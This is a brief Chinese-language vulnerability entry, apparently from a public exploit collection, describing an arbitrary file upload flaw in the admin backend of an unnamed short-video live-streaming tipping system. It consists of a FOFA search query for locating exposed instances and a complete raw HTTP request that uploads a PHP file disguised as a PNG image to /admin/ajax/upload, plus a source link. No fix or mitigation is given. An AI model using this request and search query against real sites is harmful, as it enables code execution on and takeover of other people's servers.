52 lines
1.4 KiB
Markdown
52 lines
1.4 KiB
Markdown
# 某短视频直播打赏系统后台任意文件上传漏洞
|
|
|
|
|
|
|
|
## fofa
|
|
|
|
```java
|
|
"Location: https://m.baidu.com" && domain!="baidu.com"
|
|
```
|
|
|
|
## poc
|
|
|
|
```java
|
|
POST /admin/ajax/upload HTTP/1.1
|
|
Host: 127.0.0.1:81
|
|
Content-Length: 290
|
|
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHCE6rweLU4xoLd
|
|
X-Requested-With: XMLHttpRequest
|
|
sec-ch-ua-mobile: ?0
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
|
|
sec-ch-ua-platform: "Windows"
|
|
Origin: http://127.0.0.1:81
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Dest: empty
|
|
Referer: http://127.0.0.1:81/admin/stock/add?d=dsp
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|
Cookie: userid=1; PHPSESSID=300471c6cebde33867306a662af88460
|
|
Connection: close
|
|
|
|
------WebKitFormBoundaryqVHCE6rweLU4xoLd
|
|
Content-Disposition: form-data; name="type"
|
|
|
|
php
|
|
------WebKitFormBoundaryqVHCE6rweLU4xoLd
|
|
Content-Disposition: form-data; name="file"; filename="2.php"
|
|
Content-Type: image/png
|
|
|
|
<?php phpinfo();?>
|
|
------WebKitFormBoundaryqVHCE6rweLU4xoLd--
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞来源
|
|
|
|
- https://mp.weixin.qq.com/s/zg5H5dPoJbLrKEQLY9FfYA |